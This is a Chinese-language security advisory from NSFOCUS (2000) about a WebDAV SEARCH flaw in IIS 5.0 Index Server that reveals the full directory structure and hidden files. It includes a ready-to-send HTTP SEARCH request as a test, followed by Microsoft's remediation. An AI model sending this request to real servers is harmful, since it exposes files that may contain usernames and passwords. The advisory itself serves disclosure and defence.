發布日期: 2000-10-6

更新日期: 2000-10-6
受影響的系統: Microsoft IIS 5.0
+ Microsoft Windows NT 2000

描述:
--------------------------------------------------------------------------------

如果IIS 5.0中的Index Server被允許的話，遠程用戶就可能察看整個根目錄結構以及所有子目錄，這是因為WebDAV的查找實現中存在一個缺陷。隱藏目錄、包含文件（*.inc）或其它在正常的網站界面中一般不能存取的文檔就會由于這個漏洞而泄漏。
成功地利用這個漏洞就可能找到那些可能包含敏感信息如用戶名和密碼的特定文件。
默認情況下IIS 5.0中的Index Server是被禁止的，只有設置了“Index”屬性的目錄才會受到這個漏洞的影響。

<* 來源：David Litchfield <dlitchfield@atstake.com> *>

測試程序：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

發送如下的請求給服務器：
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>

--------------------------------------------------------------------------------
建議:
臨時解決辦法：

NSFOCUS建議您使用微軟提供的解決方案：
如果您沒有使用Index Server（比如您的網站中沒有需要查找的內容），禁止或卸載該服務。或者將包含敏感信息的目錄的“Index this resource”的選項禁止。

廠商補丁：

微軟已發布一篇知識庫文章詳細描述了這個問題的解決方法，可以在如下的位置找到這篇文章：
http://www.microsoft.com/technet/support/kb.asp?ID=272079

中聯綠盟翻譯整理，未經許可，不得轉載
歡迎訪問我們的站點http://www.nsfocus.com/
中聯綠盟給您安全的保障